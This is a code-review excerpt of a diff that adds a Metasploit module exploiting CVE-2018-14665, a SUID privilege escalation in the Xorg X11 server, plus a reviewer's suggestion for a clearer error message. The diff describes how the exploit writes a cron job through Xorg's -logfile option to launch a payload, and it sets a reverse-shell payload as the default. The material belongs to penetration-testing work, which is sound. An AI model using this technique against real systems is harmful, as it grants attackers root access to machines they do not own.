modules/exploits/multi/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,176 @@
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xorg X11 Server SUID privilege escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges with SUID Xorg X11 server
+        versions 1.19.0 < 1.20.3.
+
+        A permission check flaw exists for -modulepath and -logfile options when
+        starting Xorg.  This allows unprivileged users that start the server
+        the ability to elevate privileges and run arbitrary code under root
+        privileges.
+
+        This module writes a cron job using the Xorg -logfile option. On write
+        crontab.old will be created so it must be removed after exploit.  Cron
+        will run a small script to launch a payload. It has been tested with
+        OpenBSD 6.3,6.4, and CentOS 7.  Currently CentOS requires console
+        auth. Xorg must have SUID permissions and may not start if running.
+        On successful exploitation artifacts will be created consistant with
+        starting Xorg and running a cron.  If the system is logging cron the
+        log will contain many entries for the sections in crontab not valid in
+        addition to the path of your payload.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Raptor - 0xdea',  # Modified exploit for cron
+          'Aaron Ringo'      # Metasploit module
+        ],
+      'DisclosureDate' => 'Oct 25 2018',
+      'References'     =>
+        [
+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+           [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+        ],
+      'Platform'       =>  %w(openbsd linux),
+      'Arch'           =>    [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'SessionTypes'   =>    %w(shell meterpreter),
+      'Targets'        =>
+        [
+           ['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ],
+           ['Linux x64', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X64 ] } ],
+           ['Linux x86', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X86 ] } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'cmd/unix/reverse_openssl'
+        },
+      'DefaultTarget'  => 0))
+
+     register_advanced_options(
+      [
+         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ])
+      ]
+    )
+  end
+
+
+  def check
+
+    #suid program check
+    xorg_path = cmd_exec("command -v Xorg")
+    unless xorg_path.include?("Xorg")
+      vprint_error "Check for Xorg returned"
```

Comment:
This isn't very descriptive. The operator is unlikely to know what this means.

```suggestion
      vprint_error "Could not find Xorg executable"
```